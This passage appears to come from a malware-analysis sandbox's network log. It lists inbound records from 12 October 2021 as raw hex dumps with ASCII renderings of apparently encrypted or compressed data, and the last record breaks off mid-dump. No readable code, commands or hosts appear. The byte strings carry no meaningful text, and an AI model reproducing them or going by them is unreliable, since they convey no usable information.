2021-10-12 14:35:51 UTC	66	IN	Data Raw: 27 71 78 8c f4 dd af f1 24 b7 ed 5f 9e 37 f1 ff 85 74 87 8d ab 29 c8 f2 8f b6 43 41 ca 49 c7 55 3e 3d f5 b9 19 9a 4a b6 62 73 b1 46 a3 37 73 23 ed 12 63 29 70 d9 68 d5 1f 43 27 2d 9c 06 70 96 8c 31 f2 b6 ef ca 5e a8 8a ec 49 5d d3 bf dc 23 76 ce 51 ca 8d a9 8c fb 38 c0 1f e8 a4 17 c9 70 2f 9e 83 8a ee 45 5f 29 e3 f8 a1 ed 59 99 1b 42 16 fe 94 a3 b2 06 4b 8b a4 9a a9 84 39 67 aa 90 f7 22 bc 1d 0c ed 7d 26 52 d0 48 94 d9 dc f6 56 c3 ab ca 8f b3 a2 f9 1c 17 25 25 3b 83 9d e4 7f 8d 5b 5e 1d 02 a5 c8 fc 41 a0 a1 8f 3d 53 29 04 6b b1 40 8a 62 74 b9 e4 d4 9c ac 11 0d 29 31 c7 54 6e 3b 35 6c da 25 52 04 b8 01 a2 10 1c 16 b1 15 28 5b 50 ff f0 39 8c b6 4b 80 61 0d ba 71 3a f6 d1 24 99 83 76 62 3e 63 2f 56 0f 49 e4 b8 fc c4 20 00 ff 4e e2 4f f2 39 cf 77 a7 a7 b1 32 Data Ascii: 'qx$_7t)CAIU>=JbsF7s#c)phC'-p1^I]#vQ8p/E_)YBK9g"}&RHV%%;[^A=S)k@bt)1Tn;5l%R([P9Kaq:$vb>c/VI NO9w2
2021-10-12 14:35:51 UTC	67	IN	Data Raw: e7 09 4b 79 76 2c 8d 46 c5 4d bc 08 f8 3e bd 99 9a a3 0d 95 ed f9 28 e0 1c 7d 48 ca ac a2 f3 99 ea 2a 13 ae 62 b2 cb e0 dd dd 5b 79 14 a6 06 26 f8 1b 86 8e 9b 96 21 7d dd 2b ab 07 03 92 2c 88 b0 a9 99 f7 73 fc 61 73 e9 5f 99 ef df b4 ec 69 78 6a 76 20 0a 98 7a 46 f7 4f d3 ea 5b 51 40 72 22 02 24 04 05 8a 77 6b f6 a0 32 7b 6a a8 c4 e6 27 97 a6 81 a1 ee 1e 7b 46 78 ab d2 c5 5a ff 22 e4 5f 93 e9 51 d2 94 55 67 46 86 87 8c 4f 5e 29 9d 26 3d 52 69 ea df 11 c2 6a 0e 5f 0c fe f1 63 f4 53 00 30 b2 e0 66 f0 f1 e3 01 19 d5 01 71 66 cb f3 dc 34 91 d0 71 2c 1d ba 30 80 ec 91 7d 45 b6 13 94 e9 2c f3 6a 1c de ef 6f 5b 04 4f 51 34 a0 38 65 b8 2a 36 5e 00 c1 d9 a2 87 38 17 d4 00 e8 02 bc d4 fc f3 4c 93 84 bb 3d 72 fe e0 40 fa 55 60 26 ba 8b ab 93 a6 cc 9a 67 1b 7a 2b c2 Data Ascii: Kyv,FM>(}Hb[y&!}+,sas_ixjv zFO[Q@r"$wk2{j'{FxZ"_QUgFO^)&=Rij_cS0fqf4q,0}E,jo[OQ48e6^8L=r@U`&gz+
2021-10-12 14:35:51 UTC	68	IN	Data Raw: 01 c1 c4 3e 73 3c 74 63 f6 04 cf b8 ea 23 a8 cf 07 98 4e c0 28 96 69 bd cd ad 56 f1 d4 9e 9b 4d 7e 28 45 c5 55 39 3f f1 b0 19 b6 4a b6 62 73 96 5e 90 2b 6b ba d6 05 43 28 71 71 68 f3 1d 7a 83 24 12 bb 46 e4 9a 30 f8 94 14 cf 40 b3 a7 2e 56 75 cf 96 f8 29 67 cd 2f e8 e0 8e 8b ea 25 c6 c0 ea b6 69 ef 66 a2 93 92 83 80 7d 78 38 cf e5 b7 f9 c3 a5 95 f5 78 70 84 85 ac 3d e2 a3 b7 91 b6 ae a4 5f c5 88 f7 34 9e a6 04 e7 a9 1f 58 e9 71 83 54 d1 e5 5d ea 96 eb 9e 96 be c0 33 9b 1a 2f e5 82 39 df 5c 99 32 ec 1d 02 af d7 83 cd 9f a1 8f 3c 72 00 f6 6a 86 4b b0 3e 9e 46 1b c3 95 bf 00 1b 21 17 f9 d1 0d 3b 35 7d 45 0d 1c 11 cb 66 cc 09 17 1b b2 57 cc 4b 5f dd b3 3b 8e 98 42 98 60 07 a3 4d ef f0 c0 21 9e 84 6c e5 5f 1f c1 46 1b 55 dc ee fa 08 2f 00 61 09 c9 06 e2 25 cd Data Ascii: >s<tc#N(iVM~(EU9?Jbs^+kC(qqhz$F0@.Vu)g/%if}x8xp=_4XqT]3/9\2<rjK>F!;5}EfWK_;B`M!l_FU/a%
2021-10-12 14:35:51 UTC	70	IN	Data Raw: 69 79 72 26 af 5c 29 75 05 72 26 9f 62 aa 45 b0 1a c3 a5 b7 17 2b d8 7f 23 dd 37 4e 93 aa 6a 98 d5 52 50 c8 99 ec 03 80 af 75 bd 6d c0 c9 07 4e 1b fb aa 2d 34 86 e3 96 83 86 44 00 11 d4 bf a5 3e 8f 81 f6 1a f9 a0 8b fa 62 59 8e 7f f8 58 e7 03 ef 56 f7 64 de a2 65 fa 1b 66 75 7d f7 49 fa 6e 5e 47 57 04 50 b4 3c d4 79 65 65 65 d7 fa 0b fd 7f a6 56 df a7 82 a8 13 53 6f 32 63 51 0d 46 dd d4 55 81 d1 71 7f 66 e1 79 51 46 44 65 7f 0c 17 56 d7 5d bc 88 20 2a 2f 84 ee ce 15 39 86 0b 4e 08 62 03 7b f6 42 00 09 38 70 4e 1c d8 64 0f 31 07 73 8d 6d e3 dd b3 c9 9a da 6a 2a 22 e4 27 8e fb b7 e5 53 87 bd 62 71 0a db 5b 6f 22 e4 7c 5e 43 8a 50 34 a0 f0 6d d1 fe 37 1f 16 d6 03 b1 95 2b 13 ea 27 e9 02 ac a8 03 f2 5a 9b 8c aa 36 1d fe e2 5a f0 2e 60 3f 8a 82 c4 0f a7 cc 90 Data Ascii: iyr&\)ur&bE+#7NjRPumN-4D>bYXVdefu}In^GWP<yeeeVSo2cQFUqfyQFDeV] /9Nb{B8pNd1smj"'Sbq[o"\|^CP4m7+'Z6Z.`?
2021-10-12 14:35:51 UTC	71	IN	Data Raw: 49 67 47 c9 d0 09 af f6 3f 73 36 67 52 84 ec cd ba ec 2a a1 de 0f 9c 11 ef 29 b9 61 ac c4 2c 39 db c4 88 82 5a 5e b0 6c c5 55 38 3d f3 b7 6a 9c 66 bf 72 67 85 48 96 bd 78 27 69 2d 72 21 69 85 78 db 00 75 04 06 9c 0c 59 df 8b 28 eb 96 05 da 56 bf 5c 39 64 54 c8 90 e2 3c 55 58 20 f1 87 a9 9b e2 30 c6 37 fa 9f 0a d6 61 bf a7 b0 8b ef 56 66 2a d6 e6 b0 eb dd b9 17 bc 16 70 97 87 28 99 f2 51 b3 46 3b 8f b5 58 ab 83 f3 2b 99 b9 04 ed 66 02 62 d5 b8 82 78 d0 fe 41 ad 92 e8 9e 9a ab fd 18 93 1a 34 33 9d 2a 0b 5d b5 78 f8 05 6d 86 d6 83 c7 80 b7 9c 34 45 10 fe 71 4f 4b 9c 37 9a 41 03 dc e4 23 1c 09 32 27 ee d9 73 31 cb 7c f9 04 0d 07 a5 1a 51 16 16 05 b3 38 28 42 40 c0 5e 3c a0 a3 22 9b 76 0f 3e ff ef f3 c7 4b 8c 97 69 61 ce 6f 2f 54 13 5f c6 e1 f1 2c 39 fa e4 47 Data Ascii: IgG?s6gR)a,9Z^lU8=jfrgHx'i-r!ixuY(V\9dT<UX 07aVfp(QF;X+fbxA43*]xm4EqOK7A#2's1\|Q8(B@^<"v>Kiao/T_,9G
2021-10-12 14:35:51 UTC	72	IN	Data Raw: 64 d4 29 69 77 1d 84 7e fb d8 51 21 5d 6e 67 22 f6 c2 d5 41 b6 0b 31 21 bb 04 28 93 cf 23 dd 3d 30 6a ba 6f 84 b2 f3 2e cc 9f f9 2d 28 ec 74 bb 4f 46 ce 16 4d 7f 68 22 2c 3e ef 71 0f 83 8c 46 3b 6b d8 97 bd 15 0e 83 e7 1a f9 10 88 fa 6e 02 5d 7e f8 58 b1 02 ee 56 fd 7d f1 f5 66 fa 1d 65 e4 71 e6 47 eb 15 5d 47 51 66 a4 a1 14 46 12 98 62 73 50 f5 23 7e 7a b2 44 e3 0b 25 a8 15 71 ec 19 b9 54 7e bc ca 59 58 ee 2c 71 6b 78 fd 79 71 42 44 69 7f 14 13 56 db 64 3d a4 2e 2d 5c 7e fc c7 0e 5e 6f 22 d6 06 6a 2d eb 7f 45 06 21 bd 60 5a 0e d8 40 0b 31 0b 14 59 b6 e0 d7 da 22 16 dd 60 22 0b 78 37 9a d5 3c 6c 57 8d 93 d6 e6 09 d1 4e 17 cf ed 68 7c b4 73 51 32 bc 6b 62 be 00 37 0b 08 d5 f1 01 87 38 1d c6 28 3e 01 ac d0 ea 7e 5d 91 84 ba 26 66 ea c8 f9 fa 55 6b 15 16 88 Data Ascii: d)iw~Q!]ng"A1!(#=0jo.-(tOFMh",>qF;kn]~XV}feqG]GQfFbsP#~zD%qT~YX,qkxyqBDiVd=.-\~^o"j-E!`Z@1Y"`"x7<lWNh\|sQ2kb78(>~]&fUk
2021-10-12 14:35:51 UTC	73	IN	Data Raw: ab ae 7a a0 41 a2 87 23 7f c1 07 b1 f3 20 4b aa 76 69 9a 34 ee 6d e0 30 a1 42 1f 81 3e fe 09 6d 63 ac c4 26 28 d5 ca 86 b1 89 66 a5 6e 59 44 36 33 e2 b1 f0 01 5b b8 7c 7a b3 f1 81 21 62 a8 70 23 7c 32 6e 30 e5 e6 05 74 95 0d 4f 0c 58 cc 10 20 f6 81 18 d4 04 3e b3 36 57 43 c2 0b e9 2d 69 db 21 b1 13 b8 84 e7 30 c7 44 d0 b3 06 c6 74 ac 88 8d 9c cf ce 79 38 c5 72 a1 f4 c2 b9 14 de 06 52 9d 9a ce b2 f4 85 bd b0 78 a4 b5 58 36 81 f8 2e 8b dd 90 fc 79 11 62 82 da 92 5a c7 e9 1a 5e a9 e7 83 8f f3 74 1a 95 04 05 c2 82 3f f5 c0 88 7d ef 14 22 46 d7 83 cd 03 b0 81 23 4f 1e f8 f6 a0 44 af 35 ab c4 1b c3 8f 23 11 14 25 2b df 25 6c 3b 35 e1 c4 03 03 0d a7 6c 51 18 13 09 b5 27 75 d6 4e d9 bf 32 ac 5b 24 99 60 91 a1 46 ed f3 d6 57 05 94 69 6d fb 74 e9 53 3e 77 e0 e9 ed Data Ascii: zA# Kvi4m0B>mc&(fnYD63[\|z!bp#\|2n0tOX >6WC-i!0Dty8rRxX6.ybZ^t?}"F#OD5#%+%l;5lQ'uN2[$`FWimtS>w
2021-10-12 14:35:51 UTC	75	IN	Data Raw: b5 25 29 67 26 1d d4 05 6d 4d 17 82 7a 3a 5b 51 0d 5f 53 74 0d 1a 4d fe 41 b0 07 db 3b b4 e6 2c ab 83 82 dd 3d 30 1d 11 6a 92 d7 71 30 d0 b1 51 2b 00 a1 7f bd 6d f6 ce 07 4e 40 b9 ab 2d 34 9a 08 95 83 86 41 21 03 c7 bd a3 1c 23 89 de be d5 37 8e d2 7c 28 72 74 ff 78 81 d6 4d 52 fd 6a 99 c4 63 fa 17 5d fb 6f e4 44 ea 65 5c 47 51 66 a0 a4 37 44 05 9c 75 61 b2 e8 21 7e 71 b5 5e e1 30 8b 90 66 7a f8 31 72 59 6f b7 46 c7 59 ff 2a 1f f3 6d e9 5b fa e6 40 63 51 a0 ad 56 d1 7f 2a 89 31 29 74 49 ef ce 15 6f 3c 0b 4e 02 19 fc fc f2 48 15 26 ad 73 5a 32 8c e1 0b 37 16 8d 76 6c e3 d6 cf 3b 8a d5 76 33 0f ce 32 81 ee 8f 7d 47 93 af 5d 6b 26 db 5d 1d cd f4 6d 45 3a 60 cd 25 bb f1 4d 19 00 36 15 3a d0 c8 b4 17 14 08 c3 10 fe 98 84 c7 fc f3 50 41 91 bb 32 73 d6 f4 5a fa Data Ascii: %)g&mMz:[Q_StMA;,=0jq0Q+mN@-4A!#7\|(rtxMRjc]oDe\GQf7Dua!~q^0fz1rYoFYm[@cQV1)tIo<NH&sZ27vl;v32}G]k&]mE:`%M6:PA2sZ
2021-10-12 14:35:51 UTC	76	IN	Data Raw: cf 0f cb e1 3f f0 12 6b ae 4f 9e 0f 41 e3 da 0b ba f0 17 e1 37 67 6d ea 3a cf b8 ea 3a 7f d2 26 b8 21 e9 23 be 5b ac c4 b0 e7 db d3 b4 91 53 76 a5 6e c5 55 38 2c ee bb 94 91 50 b6 63 61 8d 55 a9 3d 60 34 6b 07 70 19 72 7b dc f5 0b 6b 2a 2d 9c 1d 4e c1 b4 a6 fa 9e 05 cb 57 bd b3 c6 49 71 d7 47 da 23 76 c6 16 f6 8f a9 80 e6 30 c5 c4 fb ba 19 d7 99 a3 b5 96 8e c7 6f 7c 38 c3 f8 98 d4 d5 a6 11 54 57 f2 84 85 a6 31 f4 86 a4 99 a9 af 4b 59 86 9e 26 2e 94 aa 0e c5 63 0a 7d cb 4a 9c 58 d6 f6 5f dd b5 17 9f bc a6 ec 23 a3 1f 25 3d 94 17 db 5c 99 79 e6 2e bc b0 d9 8e cd 96 be 94 c2 44 2d fe 52 9d 48 b0 3e 94 5a 16 c3 86 a0 15 e4 3b 0b f7 e9 70 39 35 7d ca 1b 11 00 b1 1f 33 08 31 12 af 34 20 47 5f de bf 31 72 b1 08 91 58 0c b2 48 fe e9 dc 29 88 9c 76 61 16 71 1b 55 Data Ascii: ?kOA7gm::&!#[SvnU8,PcaU=`4kpr{k*-NWIqG#v0o\|8TW1KY&.c}JX_#%=\y.D-RH>Z;p95}314 G_1rXH)vaqU
2021-10-12 14:35:51 UTC	77	IN	Data Raw: d9 49 18 4c 77 53 29 05 6c 28 e8 d5 2e 79 a4 1b ae 71 31 ae 50 26 45 86 77 0a 9b 61 d6 6a 53 1e 90 5b b4 17 29 81 a1 20 de 40 48 6e ab 6e b8 dd 7a 2f df a9 e8 2b 28 ab 75 bb 43 57 ca 16 5e 63 2c b0 2d 39 fe e0 96 af 8e 54 23 6c d7 a9 5d 17 22 87 e1 17 d1 30 90 04 65 06 70 55 fa 79 6b fc 95 3c fd 6c f2 f7 43 f8 1e 33 9d 79 f7 4b f8 f9 5d 47 42 47 ae b5 14 de 16 98 62 65 dd e3 35 75 50 bd 50 f0 34 78 a9 39 79 e0 3a 63 50 68 44 dd f8 5d f9 27 70 78 74 17 50 fe 40 6f 61 7c 6b 11 2d ba 75 39 88 0a 0e 5e 7b 92 a5 1f 56 7f 20 4e 02 6a 38 cd f0 42 2e 21 bc 74 eb 1a f0 f2 1d 3a 2a 1b 71 6b f4 29 dd 18 99 c2 6b 22 0d 7a dd 8f d1 9d 7b 5c 87 bc 52 18 08 f7 5f 37 dc ce 9f 56 57 1b 51 34 ae cc 47 bc 03 4b 73 1c c1 dd 88 87 38 17 c1 30 ea 02 84 d6 fc f3 cb 91 84 aa 24 Data Ascii: ILwS)l(.yq1P&EwajS[) @Hnnz/+(uCW^c,-9T#l]"0epUyk<lC3yK]GBGbe5uPP4x9y:cPhD]'pxtP@oa\|k-u9^{V Nj8B.!t:*qk)k"z{\R_7VWQ4GKs80$
2021-10-12 14:35:51 UTC	79	IN	Data Raw: 57 9a 38 6e 85 cb 0f e2 e2 12 fb 1a 55 ab 5e b0 eb 67 e1 d0 03 d4 e4 4c 22 37 67 61 ea 61 cf b8 e6 32 a2 f6 4c 8a 21 ef 46 be 61 ac ce d5 02 da d5 98 93 3d 24 a4 6e c3 56 10 13 fe ae 92 f2 62 b4 63 6a fc 04 80 21 64 36 0e 6f 62 29 77 78 51 b7 0e 6b 8f 42 b4 0e 58 c6 e3 64 f9 9e 03 c9 31 e0 a3 38 4e 5e f1 d6 fd 23 70 ab 16 e0 8f a3 e5 bd 2e d7 cf d1 ad 15 f7 65 a2 b1 83 8a ef 5e 79 38 d4 f8 bb d1 ce a6 1c 55 e9 5d a9 87 be 25 e5 8c b2 6e b7 88 b7 4f a1 90 f1 2c 6a ab 20 ef 5c 08 56 22 44 f8 2f db f6 52 e8 9a eb 9d ed cf e8 0b 9f 30 25 3b 82 2c c5 5e 99 5b f0 1d 02 a7 d7 83 dc 89 aa a4 27 45 06 e1 94 b0 66 b2 26 80 46 1c d5 71 be 2c 18 2d 2c ff d6 74 c5 34 51 d7 26 1e 2b 5b 05 b6 75 1d 16 bf 12 1b 48 5c aa dc 3d 8c b4 0e 99 60 0d a3 78 fc f6 f9 24 88 95 61 Data Ascii: W8nU^gL"7gaa2L!Fa=$nVbcj!d6ob)wxQkBXd18N^#p.e^y8U]%nO,j \V"D/R0%;,^['Ef&Fq,-,t4Q&+[uH\=`x$a
2021-10-12 14:35:51 UTC	80	IN	Data Raw: c6 83 db f9 17 6e 54 07 5f 40 4a 28 29 6e ac e5 ca 3c 4f e8 1a 82 73 ba a3 4f 37 42 6b ea 20 86 5d f4 e4 b0 1c eb ae b2 08 35 8b 33 22 dd 3d bd 68 b4 73 8d a4 e6 29 d3 83 ca c5 00 ab 75 27 43 48 d1 18 07 f4 01 b4 31 21 e6 82 91 9c 91 53 69 f0 d6 a0 bd 09 1b 19 f0 03 ce 17 65 fa 64 2a ee 78 e7 72 97 85 72 50 e2 4d e9 c9 fd fc 02 6c d7 f5 f7 4f d2 65 5b 58 72 57 49 b5 3c de 8a 9e 7b 41 c2 b9 bf 78 64 83 4f b1 bf 80 b7 33 64 f5 ad 65 48 59 9a 1d d4 5f ee b0 76 60 44 c9 df d2 42 44 ff 51 97 3a 76 2f 75 39 8c bc 2a 43 52 cf 18 1f 56 7b 96 48 1d 41 0b 1a f2 42 06 bd ba 6b 62 05 d7 7f 0d 2e 2c 1f 04 f0 e5 c8 f2 28 07 dc 7f 0d 2a e7 23 8e fd 03 6a 48 b7 a4 03 7a 0f c4 6c 0a 42 e3 63 66 0c ab 51 34 aa 7a 63 a1 33 29 10 80 c7 c6 96 98 08 8b d4 1f dd 22 0c d6 fc f3 Data Ascii: nT_@J()n<OsO7Bk ]53"=hs)u'CH1!SiedxrrPMlOe[XrWI<{AxdO3deHY_v`DBDQ:v/u9CRV{HABkb.,(*#jHzlBcfQ4zc3)"
2021-10-12 14:35:51 UTC	81	IN	Data Raw: 6e 96 55 4b cb 48 91 29 4d 92 da 04 f4 1f 3e dc 23 7a ab 76 03 9c 41 e5 f8 7d ae e6 35 60 30 7a 74 8e 22 df b3 f8 ce a0 f2 04 8d 09 7c 29 96 69 a0 dd a9 32 db c4 95 8e 42 98 a4 42 cf 44 30 3b 2d bd 9c 82 5b a5 68 60 82 5c 9e 2a 9c 35 4d 32 72 2e 77 6a 71 6d 23 dd 8d 2d 9a 24 ef c8 8c 37 ee b6 6a ca 5e a4 cd 1c 4a 5d df 88 f4 30 7d c4 2f e9 99 57 8b c6 2c c0 da f0 b3 17 cc 78 b0 67 82 a6 ed 7d 7c 00 e1 10 4f 05 dc 8c 1b 42 04 6c 80 85 ef 2e e5 8b 0f 90 b6 b5 a3 54 81 a1 f6 3c 8c 54 0d c1 78 08 03 67 46 83 50 cd de c4 c3 b8 e3 95 89 b8 e8 03 8c e4 24 17 80 27 f9 5c 91 65 0e 1c 2e ad c0 8f cd 97 b8 71 3d 69 03 dd 68 9a 87 98 a9 8b 46 11 c4 95 b8 8e ad 20 fd 90 c5 6d 3b 3f 57 d5 0d 1c 13 88 02 cd fc 1d 16 bb 94 39 4a 4e c1 ad 16 cf b0 2d 83 9e 0c 9c 4c e8 dc Data Ascii: nUKH)M>#zvA}5`0zt"\|)i2BBD0;-[h`\*5M2r.wjqm#-$7j^J]0}/W,xg}\|OBl.T<TxgFP$'\e.q=ihF m;?W9JN-L
2021-10-12 14:35:51 UTC	82	IN	Data Raw: d4 0f f6 0e 31 6a 54 f3 b4 42 e4 03 2a ea ea ee 8d c9 3e 0b 33 62 1e 5e 5d 1f 35 35 2e fd fe d9 ae 76 f9 24 92 20 2a da 48 3f b9 58 55 90 26 72 76 23 90 d5 72 7c 2c ae f0 b6 00 26 0b db 7e ed 10 ab 52 ae 35 d9 8c ef 03 c8 9d c7 76 61 7e 4a ba cf 7b 77 07 39 0a 33 a8 ab 0a 5c a6 f3 0f 28 2a 5c 24 a1 88 f7 b6 2e 96 b3 31 70 5f 09 f7 46 19 5c 40 40 21 25 90 ac c2 b8 b9 92 a0 38 56 e2 ef e8 93 62 a3 cf b6 39 99 aa b4 3e 44 91 3d 54 99 e3 39 ea e1 35 9f fe 6b ae 54 a7 88 56 35 c3 19 bf f6 2e 61 04 bb 14 39 22 ce b2 ed 26 a6 b1 39 8d 21 e3 3e 4c 70 bf d7 b6 01 34 d5 9e 91 55 77 a9 01 f1 57 38 26 d3 13 90 9d 4c a0 4b 4e 93 57 8b 37 51 3f 68 05 dd 2d 71 7d 16 3b 0b 6b 83 2a 8d 00 37 f8 8e 31 f2 b6 ba cf 5e a4 b4 10 66 5d d9 9d ee 10 7d cd 16 22 8b a9 8c 85 e3 d7 Data Ascii: 1jTB>3b^]55.v$ H?XU&rv#r\|,&~R5va~J{w93\(\$.1p_F\@@!%8Vb9>D=T95kTV5.a9"&9!>Lp4UwW8&LKNW7Q?h-q};k71^f]}"
2021-10-12 14:35:51 UTC	83	IN	Data Raw: a4 16 af a8 a6 da 10 f3 c0 1b 18 36 3f 3a 66 dd df e1 ec 84 2f 8b 12 ef 7b dd a7 47 07 5d c1 3c 8d be 0f 94 d5 71 a5 1d 7c 0d ac 89 14 d8 f0 68 0b 19 93 a1 b5 ee 00 97 a7 db 09 0a a5 f8 00 f0 b7 f3 d9 b9 ba 9d d8 d9 8c 01 68 34 90 ca 37 7e 79 ca 0f f9 9b c8 2e 73 79 ad 36 e0 03 b2 d9 01 ab 6d ca 71 8f 7e a5 f1 83 d4 a5 f2 4a a7 4c c0 19 90 5a cd 53 c0 b3 c3 fe 38 b2 68 ba c3 dd 65 c7 ba 2b 6e 1e 78 ab ff e0 fc 50 94 5a 85 c4 fb 07 ea ac 19 67 6a a9 3f ff 90 3b e1 d5 30 7c 53 1a 93 7a 3f 5b 51 0d 56 66 fb 0d 99 4a d5 52 b5 06 f8 3b b4 06 24 b0 7d 23 f1 38 37 64 b7 79 9b dd 6b 26 d2 67 eb 07 30 ba 71 ac c9 68 ca 07 49 7e 2f 5a 2c 3e e3 27 0d 83 8c 4c 39 69 c6 bd d8 d0 0e 85 f2 1f 40 28 f7 a5 d0 b6 63 7b ee 7a b3 ff ee 5c d7 73 ff ce 68 fa 0c 47 ed 87 f6 63 Data Ascii: 6?:f/{G]<q\|hh47~y.sy6mq~JLZS8he+nxPZgj?;0\|Sz?[QVfJR;$}#87dyk&g0qhI~/Z,>'L9i@(c{z\shGc
2021-10-12 14:35:51 UTC	84	IN	Data Raw: 07 d2 64 44 79 eb 04 e1 92 48 4c 45 f7 be 7b a0 17 d4 e1 cf f5 0c a9 05 09 22 6c 2d e0 5e 33 3d 36 6d d4 75 da 8d 6f 74 a3 fe a4 c0 d8 4e ba 6b 8d 55 81 20 13 d3 30 9f df 75 5b 1d bf 0e bd 3a 31 29 de 8c 38 10 ab 59 a9 15 f1 00 a9 09 de af ed eb 6e 7a 3e 01 fc 7a 7d 1b 06 a8 0c a8 a1 1d 47 9e da 21 20 02 00 2e 7c 2d 9a 37 2f 95 a6 ba 3c e3 09 f6 5f 14 52 55 40 3f 33 92 b3 cc 98 28 5a 8c 68 5e 8a 34 c3 8d 77 ba cf a2 80 f7 80 b4 34 55 b2 29 47 92 c1 0d 93 27 3f f0 36 6d dd 60 b4 98 4b f2 d5 7a 91 e4 3f 79 1e 27 65 85 28 c7 ae 76 43 9e dc 0e 85 09 a9 2b 96 69 84 85 b8 39 d1 dc 89 07 e5 09 b1 6f c5 5f 45 ff fb ae 90 82 78 a5 6c 60 82 58 9e 66 9c 35 4d 1a 61 2b 60 71 63 98 8f 6a 89 2b ef 32 5a cc 86 4f ba 9c 05 c1 76 e1 a0 38 42 5f a2 50 f8 23 72 b7 7a e0 8f Data Ascii: dDyHLE{"l-^3=6muotNkU 0u[:1)8Ynz>z}G! .\|-7/<_RU@?3(Zh^4w4U)G'?6m`Kz?y'e(vC+i9o_Exl`Xf5Ma+`qcj+2ZOv8B_P#rz
2021-10-12 14:35:51 UTC	86	IN	Data Raw: 30 f4 52 3e 22 a4 11 88 83 07 c5 59 fa 31 1a 25 20 23 02 86 0a ff e3 ff 25 2a 89 69 36 47 ce ac c9 a1 45 04 3b 78 a9 09 90 da 0a 64 06 82 08 f3 ae 14 a3 3c 16 49 1f 94 3a bd 29 02 97 ad 92 69 a9 a6 f8 00 c1 ac e7 fc a5 a6 92 ce db 8c 01 68 21 91 d9 44 90 23 ca 0b 7d 43 78 9a 6a 72 21 00 f6 fd b2 e6 05 a3 7b d9 77 93 91 ab c2 c1 01 a6 f5 c7 98 e4 12 12 97 4d bd df cc ad 04 db 27 93 a6 bd ef 64 5c f1 40 67 91 01 5a ae e3 e9 d5 bd 8b 41 7b c5 c6 12 fb 43 11 49 71 a5 00 73 6e 30 e9 c4 2f 47 00 1a 82 79 49 27 51 21 5b e7 69 3a 8a 45 d4 50 bf 03 fb cc b5 3b 38 a9 85 a6 cc 35 09 34 ab 6a 98 b2 f8 2e cc 9f f9 2c 1f ba 66 b4 45 46 c5 18 68 96 06 87 0c 37 f8 17 9e 92 85 da 37 60 ba 65 cf 35 0e 85 f6 1c d1 37 88 ba 3f 02 e3 7e f8 58 31 61 f1 77 ee 63 f6 cc 6e e5 3c Data Ascii: 0R>"Y1% #%*i6GE;xd<I:)ih!D#}Cxjr!{wM'd\@gZA{CIqsn0/GyI'Q![i:EP;854j.,fEFh77`e57?~X1awcn<
2021-10-12 14:35:51 UTC	87	IN	Data Raw: ee 0b 33 3b cb 02 ec da 47 55 e2 1a e5 0b 3b 62 48 e8 f9 ad e1 39 d6 c0 c3 d5 02 29 c5 f4 08 66 05 a0 47 03 30 1e 5d d1 75 d0 32 76 e2 05 93 5b 07 d8 48 3b 15 dc c4 9e 29 4c a1 25 90 df 66 57 71 90 f2 bc 1c 11 41 ab 3f 7c 10 a1 70 f8 1f f7 86 c7 48 dc ae cf 45 01 fe 35 29 c9 08 43 13 11 2e 4d ea a3 1c 65 85 98 23 2a 20 d6 ce 7c 27 f4 ba 38 98 a2 4d c8 e3 09 f3 60 57 4f 3c 98 30 33 87 32 64 a4 d4 59 db f3 5c f1 f9 b7 0c 73 b2 df a4 2d b3 ab b4 30 d9 2d b6 79 92 cb 0e e0 c9 0c f1 32 61 86 04 b6 98 4b f4 06 84 84 e6 3f 71 1e 2d 65 85 28 ba 9b e0 30 ba a3 c5 8f 21 ed 02 85 61 a4 ec e0 39 db df 89 47 df 4c a5 6e c7 28 f3 2c fb aa 82 95 62 ec 63 60 99 44 90 32 64 0c f0 28 63 29 73 78 0a c9 09 6b 83 33 f6 7f 67 ce 8c 3b d0 de 07 cb 54 b3 a4 20 90 2e 9d 95 f8 29 Data Ascii: 3;GU;bH9)fG0]u2v[H;)L%fWqA?\|pHE5)C.Me#* \|'8M`WO<032dY\s-0-y2aK?q-e(0!a9GLn(,bc`D2d(c)sxk3g;T .)
2021-10-12 14:35:51 UTC	88	IN	Data Raw: a5 be 36 cb 06 cf f5 7e 36 48 68 00 85 b6 d8 e4 1b e9 34 03 5e 5c 03 3b 78 01 fb ad c5 d9 22 9f 29 24 7a dd a3 cb cb 81 1b 0d 82 a1 34 89 0e fe 86 06 82 0e fb 40 16 a3 32 79 06 35 dd 32 95 64 02 ec 61 84 29 8e a2 8b 3e dc 9b fe e2 ad c4 a2 d3 c1 78 28 04 3b 93 c2 5d bc 0a 8e 09 77 26 d1 db 68 74 a7 17 b7 ff b3 ff 12 b9 71 c7 f7 ba 80 a4 df fa 32 a7 d9 ca 17 34 02 13 97 58 5e f4 6c ad 15 d4 3a da 93 bc c3 69 6d d6 bc 4e e1 34 69 bd ee 92 14 b2 94 5e 94 c9 c2 49 f3 52 12 49 1b 6b 28 29 6a 37 90 eb 2b 6f 50 0b 8a 00 19 a7 50 2b 75 38 74 26 93 5b d0 32 f4 1e eb 38 9c 57 2f ab 89 0a 9c 3f 21 64 ba 6f 83 d0 f5 06 cc 99 e8 50 cd ab 75 bf f2 38 de 06 48 62 a5 80 79 3c 92 d5 97 83 88 45 39 6a 06 30 89 16 0e 87 8d cc d1 37 8c eb 69 28 75 0d c6 50 88 f4 ff 5e 8e 53 Data Ascii: 6~6Hh4^\;x")$z4@2y52da)>x(;]w&htq24X^l:imN4i^IRIk()j7+oPP+u8t&[28W/?!doPu8Hby<E9j07i(uP^S
2021-10-12 14:35:51 UTC	89	IN	Data Raw: 04 68 fa 07 cd f8 0f ac 17 d1 1c f3 33 dc 51 f0 0d f6 0e 28 76 6f e6 b4 53 ea b7 d2 fa c2 77 8e f2 f7 0f 22 60 12 2d 5b 33 37 1f 3f dc 64 da 92 5e 2c 10 91 26 63 c9 42 2b 02 4c 7d 22 24 0c ef 35 1c e0 64 54 03 b8 d8 4d 17 08 21 f4 02 55 55 a9 5a c3 d1 f7 8c eb 7d 5f ae c5 5c 7f 7e 23 ff 42 6e 7d 11 10 0c 79 aa a1 16 1b 8c db 21 31 57 96 2e 7c 23 f7 cd e2 95 a0 32 12 e7 0f e6 48 88 65 db 53 30 39 21 ad d7 be 00 48 a4 29 58 e0 f5 fd c0 8d 4d 21 a4 54 03 62 b4 34 53 9d b5 6d 92 cb 0d 93 34 3f f0 36 7c c4 84 b4 e3 86 e3 d0 0d c0 3e 85 1c b0 66 67 83 08 ce ab d0 32 a1 f4 0e 8f 21 ef 29 96 72 ba cf 91 22 db d2 89 6f 53 4a a7 76 ce 55 3f 3a 05 af b8 9f 5d bd 63 67 8b a9 80 0d 60 1f 63 06 80 2b 0a b0 79 f7 0f e5 3e 07 9c 0c 4b fc 8f 31 8d 9e 05 cb 56 a2 